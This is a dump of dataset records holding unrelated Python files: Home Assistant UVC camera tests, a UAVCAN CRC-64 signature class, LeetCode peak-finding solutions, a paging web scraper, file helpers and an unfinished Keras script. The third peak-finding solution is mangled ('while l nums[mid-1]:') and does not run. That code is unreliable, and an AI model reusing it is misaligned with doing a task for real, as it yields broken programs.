[1,2,'a','b']\n\nfilter_list(testcase)\nprint(testcase)","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173452726","text":"\"\"\"The tests for UVC camera module.\"\"\"\nimport socket\nimport unittest\nfrom unittest import mock\n\nimport pytest\nimport requests\nfrom uvcclient import camera, nvr\n\nfrom homeassistant.components.camera import SUPPORT_STREAM\nfrom homeassistant.components.uvc import camera as uvc\nfrom homeassistant.exceptions import PlatformNotReady\nfrom homeassistant.setup import setup_component\n\nfrom tests.common import get_test_home_assistant\n\n\nclass TestUVCSetup(unittest.TestCase):\n \"\"\"Test the UVC camera platform.\"\"\"\n\n def setUp(self):\n \"\"\"Set up things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n self.addCleanup(self.hass.stop)\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_full_config(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with full configuration.\"\"\"\n config = {\n \"platform\": \"uvc\",\n \"nvr\": \"foo\",\n \"password\": \"bar\",\n \"port\": 123,\n \"key\": \"secret\",\n }\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n {\"uuid\": \"three\", \"name\": \"Old AirCam\", \"id\": \"id3\"},\n ]\n\n def mock_get_camera(uuid):\n \"\"\"Create a mock camera.\"\"\"\n if uuid == \"id3\":\n return {\"model\": \"airCam\"}\n return {\"model\": \"UVC\"}\n\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.side_effect = mock_get_camera\n mock_remote.return_value.server_version = (3, 2, 0)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert mock_remote.call_args == mock.call(\"foo\", 123, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"id1\", \"Front\", \"bar\"),\n mock.call(mock_remote.return_value, \"id2\", \"Back\", \"bar\"),\n ]\n )\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_partial_config(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with partial configuration.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n ]\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.return_value = {\"model\": \"UVC\"}\n mock_remote.return_value.server_version = (3, 2, 0)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert mock_remote.call_args == mock.call(\"foo\", 7080, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"id1\", \"Front\", \"ubnt\"),\n mock.call(mock_remote.return_value, \"id2\", \"Back\", \"ubnt\"),\n ]\n )\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_partial_config_v31x(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with a v3.1.x server.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n ]\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.return_value = {\"model\": \"UVC\"}\n mock_remote.return_value.server_version = (3, 1, 3)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert mock_remote.call_args == mock.call(\"foo\", 7080, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"one\", \"Front\", \"ubnt\"),\n mock.call(mock_remote.return_value, \"two\", \"Back\", \"ubnt\"),\n ]\n )\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_incomplete_config(self, mock_uvc):\n \"\"\"Test the setup with incomplete configuration.\"\"\"\n assert setup_component(self.hass, \"camera\", {\"platform\": \"uvc\", \"nvr\": \"foo\"})\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n assert setup_component(\n self.hass, \"camera\", {\"platform\": \"uvc\", \"key\": \"secret\"}\n )\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n assert setup_component(\n self.hass, \"camera\", {\"platform\": \"uvc\", \"port\": \"invalid\"}\n )\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n def setup_nvr_errors_during_indexing(self, error, mock_remote, mock_uvc):\n \"\"\"Set up test for NVR errors during indexing.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_remote.return_value.index.side_effect = error\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n\n def test_setup_nvr_error_during_indexing_notauthorized(self):\n \"\"\"Test for error: nvr.NotAuthorized.\"\"\"\n self.setup_nvr_errors_during_indexing(nvr.NotAuthorized)\n\n def test_setup_nvr_error_during_indexing_nvrerror(self):\n \"\"\"Test for error: nvr.NvrError.\"\"\"\n self.setup_nvr_errors_during_indexing(nvr.NvrError)\n pytest.raises(PlatformNotReady)\n\n def test_setup_nvr_error_during_indexing_connectionerror(self):\n \"\"\"Test for error: requests.exceptions.ConnectionError.\"\"\"\n self.setup_nvr_errors_during_indexing(requests.exceptions.ConnectionError)\n pytest.raises(PlatformNotReady)\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n @mock.patch(\"uvcclient.nvr.UVCRemote.__init__\")\n def setup_nvr_errors_during_initialization(self, error, mock_remote, mock_uvc):\n \"\"\"Set up test for NVR errors during initialization.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_remote.return_value = None\n mock_remote.side_effect = error\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert not mock_remote.index.called\n assert not mock_uvc.called\n\n def test_setup_nvr_error_during_initialization_notauthorized(self):\n \"\"\"Test for error: nvr.NotAuthorized.\"\"\"\n self.setup_nvr_errors_during_initialization(nvr.NotAuthorized)\n\n def test_setup_nvr_error_during_initialization_nvrerror(self):\n \"\"\"Test for error: nvr.NvrError.\"\"\"\n self.setup_nvr_errors_during_initialization(nvr.NvrError)\n pytest.raises(PlatformNotReady)\n\n def test_setup_nvr_error_during_initialization_connectionerror(self):\n \"\"\"Test for error: requests.exceptions.ConnectionError.\"\"\"\n self.setup_nvr_errors_during_initialization(requests.exceptions.ConnectionError)\n pytest.raises(PlatformNotReady)\n\n\nclass TestUVC(unittest.TestCase):\n \"\"\"Test class for UVC.\"\"\"\n\n def setup_method(self, method):\n \"\"\"Set up the mock camera.\"\"\"\n self.nvr = mock.MagicMock()\n self.uuid = \"uuid\"\n self.name = \"name\"\n self.password = \"seekret\"\n self.uvc = uvc.UnifiVideoCamera(self.nvr, self.uuid, self.name, self.password)\n self.nvr.get_camera.return_value = {\n \"model\": \"UVC Fake\",\n \"recordingSettings\": {\"fullTimeRecordEnabled\": True},\n \"host\": \"host-a\",\n \"internalHost\": \"host-b\",\n \"username\": \"admin\",\n \"channels\": [\n {\n \"id\": \"0\",\n \"width\": 1920,\n \"height\": 1080,\n \"fps\": 25,\n \"bitrate\": 6000000,\n \"isRtspEnabled\": True,\n \"rtspUris\": [\n \"rtsp://host-a:7447/uuid_rtspchannel_0\",\n \"rtsp://foo:7447/uuid_rtspchannel_0\",\n ],\n },\n {\n \"id\": \"1\",\n \"width\": 1024,\n \"height\": 576,\n \"fps\": 15,\n \"bitrate\": 1200000,\n \"isRtspEnabled\": False,\n \"rtspUris\": [\n \"rtsp://host-a:7447/uuid_rtspchannel_1\",\n \"rtsp://foo:7447/uuid_rtspchannel_1\",\n ],\n },\n ],\n }\n self.nvr.server_version = (3, 2, 0)\n self.uvc.update()\n\n def test_properties(self):\n \"\"\"Test the properties.\"\"\"\n assert self.name == self.uvc.name\n assert self.uvc.is_recording\n assert \"Ubiquiti\" == self.uvc.brand\n assert \"UVC Fake\" == self.uvc.model\n assert SUPPORT_STREAM == self.uvc.supported_features\n\n def test_stream(self):\n \"\"\"Test the RTSP stream URI.\"\"\"\n stream_source = yield from self.uvc.stream_source()\n assert stream_source == \"rtsp://foo:7447/uuid_rtspchannel_0\"\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login(self, mock_camera, mock_store):\n \"\"\"Test the login.\"\"\"\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == mock.call(\"host-a\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClient\")\n def test_login_v31x(self, mock_camera, mock_store):\n \"\"\"Test login with v3.1.x server.\"\"\"\n self.nvr.server_version = (3, 1, 3)\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == mock.call(\"host-a\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login_tries_both_addrs_and_caches(self, mock_camera, mock_store):\n \"\"\"Test the login tries.\"\"\"\n responses = [0]\n\n def mock_login(*a):\n \"\"\"Mock login.\"\"\"\n try:\n responses.pop(0)\n raise OSError\n except IndexError:\n pass\n\n mock_store.return_value.get_camera_password.return_value = None\n mock_camera.return_value.login.side_effect = mock_login\n self.uvc._login()\n assert 2 == mock_camera.call_count\n assert \"host-b\" == self.uvc._connect_addr\n\n mock_camera.reset_mock()\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == mock.call(\"host-b\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login_fails_both_properly(self, mock_camera, mock_store):\n \"\"\"Test if login fails properly.\"\"\"\n mock_camera.return_value.login.side_effect = socket.error\n assert self.uvc._login() is None\n assert self.uvc._connect_addr is None\n\n def test_camera_image_tries_login_bails_on_failure(self):\n \"\"\"Test retrieving failure.\"\"\"\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n mock_login.return_value = False\n assert self.uvc.camera_image() is None\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n\n def test_camera_image_logged_in(self):\n \"\"\"Test the login state.\"\"\"\n self.uvc._camera = mock.MagicMock()\n assert self.uvc._camera.get_snapshot.return_value == self.uvc.camera_image()\n\n def test_camera_image_error(self):\n \"\"\"Test the camera image error.\"\"\"\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = camera.CameraConnectError\n assert self.uvc.camera_image() is None\n\n def test_camera_image_reauths(self):\n \"\"\"Test the re-authentication.\"\"\"\n responses = [0]\n\n def mock_snapshot():\n \"\"\"Mock snapshot.\"\"\"\n try:\n responses.pop()\n raise camera.CameraAuthError()\n except IndexError:\n pass\n return \"image\"\n\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = mock_snapshot\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n assert \"image\" == self.uvc.camera_image()\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n assert [] == responses\n\n def test_camera_image_reauths_only_once(self):\n \"\"\"Test if the re-authentication only happens once.\"\"\"\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = camera.CameraAuthError\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n with pytest.raises(camera.CameraAuthError):\n self.uvc.camera_image()\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n","sub_path":"tests/components/uvc/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":13925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"36339442","text":"#\n# Copyright (C) 2014-2015 UAVCAN Development Team \n#\n# This software is distributed under the terms of the MIT License.\n#\n# Author: Pavel Kirienko \n# Ben Dyer \n#\n\nfrom __future__ import division, absolute_import, print_function, unicode_literals\n\n#\n# CRC-64-WE\n# Description: http://reveng.sourceforge.net/crc-catalogue/17plus.htm#crc.cat-bits.64\n# Initial value: 0xFFFFFFFFFFFFFFFF\n# Poly: 0x42F0E1EBA9EA3693\n# Reverse: no\n# Output xor: 0xFFFFFFFFFFFFFFFF\n# Check: 0x62EC59E3F1A4F00A\n#\n\n\nclass Signature:\n '''\n This class implements the UAVCAN DSDL signature hash function. Please refer to the specification for details.\n '''\n MASK64 = 0xFFFFFFFFFFFFFFFF\n POLY = 0x42F0E1EBA9EA3693\n\n def __init__(self, extend_from=None):\n '''\n extend_from Initial value (optional)\n '''\n if extend_from is not None:\n self._crc = (int(extend_from) & Signature.MASK64) ^ Signature.MASK64\n else:\n self._crc = Signature.MASK64\n\n def add(self, data_bytes):\n '''Feed ASCII string or bytes to the signature function'''\n try:\n if isinstance(data_bytes, basestring): # Python 2.7 compatibility\n data_bytes = map(ord, data_bytes)\n except NameError:\n if isinstance(data_bytes, str): # This branch will be taken on Python 3\n data_bytes = map(ord, data_bytes)\n\n for b in data_bytes:\n self._crc ^= (b << 56) & Signature.MASK64\n for _ in range(8):\n if self._crc & (1 << 63):\n self._crc = ((self._crc << 1) & Signature.MASK64) ^ Signature.POLY\n else:\n self._crc <<= 1\n\n def get_value(self):\n '''Returns integer signature value'''\n return (self._crc & Signature.MASK64) ^ Signature.MASK64\n\n\ndef compute_signature(data):\n '''\n One-shot signature computation for ASCII string or bytes.\n Returns integer signture value.\n '''\n s = Signature()\n s.add(data)\n return s.get_value()\n\n\n# if __name__ == '__main__':\nif 1:\n s = Signature()\n s.add(b'123')\n s.add('456789')\n assert s.get_value() == 0x62EC59E3F1A4F00A\n","sub_path":"uavcan/dsdl/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"504881963","text":"# Basic Idea: Binary search\n\n# Elaboration: \n# if an element(not the right-most one) is smaller than its right neighbor, \n# then there must be a peak element on its right, because the elements on its right is either \n# 1. always increasing -> the right-most element is the peak\n# 2. always decreasing -> the left-most element is the peak\n# 3. first increasing then decreasing -> the pivot point is the peak\n# 4. first decreasing then increasing -> the left-most element is the peak \n\n# Therefore, we can find the peak only on its right elements (cut the array to half)\n# The same idea applies to that an element (not the left-most one) is smaller than its left neighbor.\n\n# Conditions:\n# 1. array length is 1 -> return the only index \n# 2. array length is 2 -> return the bigger number's index \n# 3. array length is bigger than 2 -> \n# (1) find mid, compare it with its left and right neighbors \n# (2) return mid if nums[mid] greater than both neighbors\n# (3) take the right half array if nums[mid] smaller than right neighbor\n# (4) otherwise, take the left half\n\n\n# Run time: O(logn)\n# Memory: constant\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n l, r = 0, len(nums)-1\n while l < r:\n mid = (l+r)//2\n if nums[mid] > nums[mid+1]:\n r = mid\n else:\n l = mid + 1\n return l\n\n# Run time: O(logn)\n# Memory: constant\ndef findPeakElement(self, nums):\n left = 0\n right = len(nums)-1\n\n # handle condition 3\n while left < right-1:\n mid = (left+right)/2\n if nums[mid] > nums[mid+1] and nums[mid] > nums[mid-1]:\n return mid\n # increasing, pick right\n if nums[mid] < nums[mid+1]:\n left = mid+1\n # decreasing, pick left\n else:\n right = mid-1\n \n #handle condition 1 and 2\n return left if nums[left] >= nums[right] else right\n# Runtime: 25 ms, faster than 95.93% of Python online submissions for Find Peak Element.\n# Memory Usage: 13.6 MB, less than 69.96% of Python online submissions for Find Peak Element.\n\nclass Solution(object):\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return 0\n elif len(nums) == 2:\n return 0 if nums[0] > nums[1] else 1\n \n l,r=0,len(nums)-1\n while l nums[mid-1]:\n return mid \n # increasing: must be at least a peak between mid and r\n # if mid+1 is on the edge, it's a peak\n elif nums[mid+1] > nums[mid] and nums[mid] > nums[mid-1]:\n if mid+1 == r:\n return r\n else:\n l = mid\n # decreasing: must be at least a peak between l and mid\n # if mid-1 is on the edge, it's a peak\n elif nums[mid+1] < nums[mid] and nums[mid] < nums[mid-1]: \n if mid-1 == l:\n return l\n else:\n r = mid\n # hole: must be at least a peak between mid and r as nums[-1] = -inf\n elif nums[mid+1] > nums[mid] and nums[mid] < nums[mid-1]:\n l = mid+1\n return l\n# Runtime: 36 ms, faster than 69.80% of Python online submissions for Find Peak Element.\n# Memory Usage: 13.7 MB, less than 18.94% of Python online submissions for Find Peak Element.","sub_path":"162. Find Peak Element.py","file_name":"162. Find Peak Element.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"154147098","text":"import os,re,csv,time,random\nimport requests\nfrom urllib import request,parse\nfrom bs4 import BeautifulSoup as bs\nimport traceback\n\nhead2={\n'Accept':\"\",\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n'Cookie':\"\",\n'Host':'',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/63.0.3239.84'\n}\n\nhost = r\"\"\ndst = r\"\"\nsrcfi = csv.reader(open(r\"fenlei.csv\",'r'))\n\nnum = 1\nfor fenlei in srcfi:\n dir_name = fenlei[0]\n seed_url = fenlei[1]\n savedir = os.path.join(dst,dir_name)\n if not os.path.exists(savedir):\n os.mkdir(savedir)\n \n s_requ = requests.post(seed_url,headers=head2) #post请求,获取每种分类的第一页,以此为基础,\n s_page = s_requ.text\n with open(os.path.join(savedir,\"1.html\"),'w')as html0: #存储第一页\n html0.write(s_page)\n num = num+1\n s_soup = bs(s_page,\"html.parser\") #将获取到的第一页转成html格式\n linkls = {} \n als = s_soup.select(\".next\")[0].select(\"a\") #将第一页底部的页码装入字典linkls{}\n for link in als:\n s_num = link.get_text()\n s_href = link.get(\"href\")\n if s_num not in linkls:\n linkls[s_num] = s_href\n sumpage = s_soup.select(\"#ctl\")[0].get_text() #获得页面底部的 该小分类总页数\n st = sumpage[sumpage.find(\"/\"):]\n page_num = int(re.findall(\"\\d+\",st)[0]) \n \n for i in range(2,page_num+1): #循环下载,直到该小分类最后一页\n url = host + linkls[str(i)]\n savepath = savedir +\"/\"+str(i)+\".html\"\n num = num+1\n print(num,savepath)\n \n try:\n response = requests.post(url,headers=head2,timeout=5) \n if response.status_code ==200:\n page = response.text\n except :\n #此处应将savepath写入日志,\n traceback.print_exc()\n\n #page = response.text\n \n \n \n if not os.path.exists(savepath):\n with open(savepath,'w')as html:\n html.write(page)\n \n newsoup = bs(page,\"html.parser\")\n newls = newsoup.select(\".next\")[0].select(\"a\")\n linkls = {}\n for link in newls:\n pagenum = link.get_text()\n pagehref = link.get(\"href\")\n if pagenum not in linkls:\n linkls[pagenum] = pagehref\n \n if num %100 ==0:\n time.sleep(5) \n else:\n time.sleep(1+random.uniform(0,2)) \n\n\n","sub_path":"htmload.py","file_name":"htmload.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"18555181","text":"'''\r\n Accept five numbers from user and print only even numbers.\r\n'''\r\n\r\nt=()\r\nprint(\"Enter five numbers\")\r\nfor i in range(5):\r\n t=t+(int(input()),)\r\n\r\n \r\nprint(\"even numbers are\")\r\nfor i in t:\r\n if(i%2==0):\r\n print(i)\r\n \r\n","sub_path":"26.09.2020 Python/even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"415014933","text":"variabel = 10\n\n# Gir UnboundLocalError, siden variabel ikke er i skopet til prosedyren\ndef leggTilTi():\n variabel += 10\n\n# Bruker try-except for å fange erroren og tillate programmet å fortsette å kjøre\ntry:\n leggTilTi()\nexcept UnboundLocalError:\n print(\"Oops\")\n\n# Prosedyrer har med andre ord tilgang på å bruke variabler, men ikke endre dem\ndef printVariabel():\n print(variabel)\n\ndef leggTilTiTilNy():\n nyvariabel = variabel + 10\n print(nyvariabel)\n\nleggTilTiTilNy()\n\nprintVariabel()\n\nprint(variabel)\n\n# Hvis vi bruker parametre og returverdier kan vi få tilgang på alt som blir sendt inn, parametre er en måte å gi prosedyrer/funksjoner tilgang!\ndef leggTilTi(variabel):\n variabel += 10\n return variabel\n\nprint(leggTilTi(variabel))\n\n# Men selve variabelen har ikke blitt endret\nprint(variabel)\n","sub_path":"Uke 5/skop.py","file_name":"skop.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"360553756","text":"from pathlib import Path\nimport locale\n\nfrom pylt3.type_helpers import verify_kwargs, is_simple_list\n\n\ndef scan_dir_and_execute(root, exec_func, exclude_dirs=None, verbose=0, **kwargs):\n default_params = {'recursive': True}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {verbose} for verbose. 0, 1, or 2 expected\")\n\n # Rather than use an empty list that would be mutated at each call (Mutable Default Argument), use None and check\n if exclude_dirs is None:\n exclude_dirs = []\n\n if verbose > 0:\n print(f\"TRAVERSING {root}\", flush=True)\n\n for entry in Path(root).glob('*'):\n if entry.is_dir() and entry.name not in exclude_dirs:\n if kwargs['recursive']:\n # If truth-y value: keep value, otherwise use None\n next_exclude = exclude_dirs if exclude_dirs else None\n scan_dir_and_execute(entry.path, exec_func, next_exclude, verbose=verbose, recursive=True)\n elif entry.is_file():\n if verbose > 1:\n print(f\"\\tProcessing {entry.name}\", flush=True)\n\n exec_func(entry.path)\n\n return None\n\n\ndef scan_file_and_execute(file, exec_func, verbose=0, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {verbose} for verbose\")\n\n line_i = 0\n with open(file, encoding=kwargs['encoding']) as f:\n for line in f:\n if verbose > 0:\n proc_str = \"Processing\"\n if verbose > 1:\n proc_str += f\" file {file}\"\n proc_str += f\" line {line_i+1}\"\n print(proc_str, end=\"\\r\", flush=True)\n\n exec_func(line, line_i)\n line_i += 1\n\n return None\n\n\ndef concatenate_files(input_item, output_file, extension=None, remove_headers=0, verbose=0, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding(), 'recursive': True, 'retain_first_header': False}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {kwargs['verbose']} for verbose\")\n\n if remove_headers and not remove_headers > 0:\n raise ValueError(f\"Unexpected value {remove_headers} for remove_headers. Use a positive integer that indicates \"\n f\"how many lines should be removed from the top of each file. True will remove the first line\")\n\n if extension is None:\n extension = ''\n elif not isinstance(extension, str):\n raise ValueError(f\"Unexpected value {extension} for extension. A str value is expected\")\n\n is_file_list = True if isinstance(input_item, list) else False\n\n files_skipped_n = 0\n files_concat_n = 0\n\n def append_to_file(file_path, _fout):\n nonlocal files_concat_n, files_skipped_n\n if not extension or str(file_path).endswith(extension):\n files_concat_n = files_concat_n+1\n with open(file_path, 'r', encoding=kwargs['encoding']) as fin:\n line_n = 0\n for line in fin:\n line_n = line_n+1\n if (files_concat_n == 1 and kwargs['retain_first_header']) or line_n > remove_headers:\n _fout.write(line)\n else:\n files_skipped_n += 1\n\n return None\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n if is_file_list:\n for file in input_item:\n # Resolve, i.e. ensure rel->abs path, and append\n append_to_file(Path(file).resolve(), fout)\n else:\n scan_dir_and_execute(input_item, lambda _file: append_to_file(_file, fout), recursive=kwargs['recursive'],\n verbose=verbose)\n if verbose > 0:\n print(f\"Finished! Concatenated {files_concat_n} files, skipped {files_skipped_n} files\", flush=True)\n\n return output_file\n\n\ndef print_simple_dict(simple_dict, output_file, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n for key, val in simple_dict.items():\n if is_simple_list(key):\n key = \"\\t\".join(key)\n if is_simple_list(val):\n val = \"\\t\".join(val)\n\n fout.write(f\"{key}\\t{val}\\n\")\n\n return output_file\n\n\ndef print_tuplelist(tupelist, output_file, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n for tupe in tupelist:\n key = tupe[0]\n val = tupe[1]\n if is_simple_list(key):\n key = \"\\t\".join(key)\n if is_simple_list(val):\n val = \"\\t\".join(val)\n\n fout.write(f\"{key}\\t{val}\\n\")\n\n return output_file\n","sub_path":"pylt3/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"101544719","text":"import os\n\n#from keras import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import metrics\n\nimport keras.backend as K\nimport keras.callbacks\nimport keras\nimport numpy\n\nimport sys\nimport h5py\n\nimport argparse\nimport random\nimport time\n\n########\n# INIT #\n########\n\nnumpy.random.seed( 0 )\n\n#############\n# CONSTANTS #\n#############\n\n#0 1 2 3 4 5 6 7 8 9 10\n#best_possible_hbond_score,worst_possible_clash_score,tx,ty,tz,rz,ry,rz,angle1,angle2,dist\n\nBEST_POSSIBLE_HBOND_SCORE = int( 0 )\nWORST_POSSIBLE_CLASH_SCORE = int( 1 )\n\nTX = int( 2 )\nTY = int( 3 )\nTZ = int( 4 )\n\nRX = int( 5 )\nRY = int( 6 )\nRZ = int( 7 )\n\nANGLE1 = int( 8 )\nANGLE2 = int( 9 )\nDIST = int( 10 )\n\n#########################\n# COMMAND LINE SETTINGS #\n#########################\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument( \"--num_neurons_in_first_hidden_layer\", help=\"Number of neruons for first hidden layer.\", default=\"100\", type=int, required=False )\nparser.add_argument( \"--num_neurons_in_intermediate_hidden_layer\", help=\"Number of neruons for intermediate hidden layer.\", default=\"100\", type=int, required=False )\nparser.add_argument( \"--num_intermediate_hidden_layers\", help=\"Number of intermediate hidden layers.\", default=\"4\", type=int, required=False )\n\nparser.add_argument( \"--num_epochs\", help=\"Number of epochs to give to model.fit()\", default=\"150\", type=int, required=False )\n\nparser.add_argument( \"--test_predictions\", help=\"filename for test predictions\", default=\"\", required=False )\n\nparser.add_argument( \"--weight\", help=\"Class weight for 1\", default=\"3.0\", required=True )\n\nargs = parser.parse_args()\n\nnum_neurons_in_first_hidden_layer = args.num_neurons_in_first_hidden_layer\nprint( \"num_neurons_in_first_hidden_layer: \" + str( num_neurons_in_first_hidden_layer ) )\n\nnum_neurons_in_intermediate_hidden_layer = args.num_neurons_in_intermediate_hidden_layer\nprint( \"num_neurons_in_intermediate_hidden_layer: \" + str( num_neurons_in_intermediate_hidden_layer ) )\n\nnum_intermediate_hidden_layers = args.num_intermediate_hidden_layers\nprint( \"num_intermediate_hidden_layers: \" + str( num_intermediate_hidden_layers ) )\n\nnum_epochs = args.num_epochs #150 is small\nprint( \"num_epochs: \" + str( num_epochs ) )\n\nweight1 = args.weight\nprint( \"class weight for 1: \" + str( weight1 ) );\n\n#########\n# FUNCS #\n#########\n\ndef my_assert_equals( name, actual, theoretical ):\n if actual != theoretical:\n print( name + \" is equal to \" + actual + \" instead of \" + theoretical )\n exit( 1 )\n\ndef keep_hbond_score( score ):\n hbond_score = score[ BEST_POSSIBLE_HBOND_SCORE ]\n print( score )\n print( hbond_score )\n exit( 0 )\n if score == 0:\n return true\n if score <= -0.5:\n return true\n return false\n\ndef normalize_single_input( input ):\n input[0] /= 20. #Tx\n input[1] /= 20. #Ty\n input[2] /= 20. #Tz\n \n input[3] /= 3.14 #Rx\n input[4] /= 3.14 #Ry\n input[5] -= 1.6 #Rz\n\n input[6] -= 1.6 #Theta1\n input[7] -= 1.6 #Theta2\n input[8] = (input[8]/15.) - 1 #D\n\ndef generate_data_from_file( filename ):\n dataset = numpy.genfromtxt( filename, delimiter=\",\", skip_header=0 )\n\n input = dataset[:,[ TX, TY, TZ, RX, RY, RZ, ANGLE1, ANGLE2, DIST ] ]\n output_hbond = dataset[:,[ BEST_POSSIBLE_HBOND_SCORE ] ]\n\n 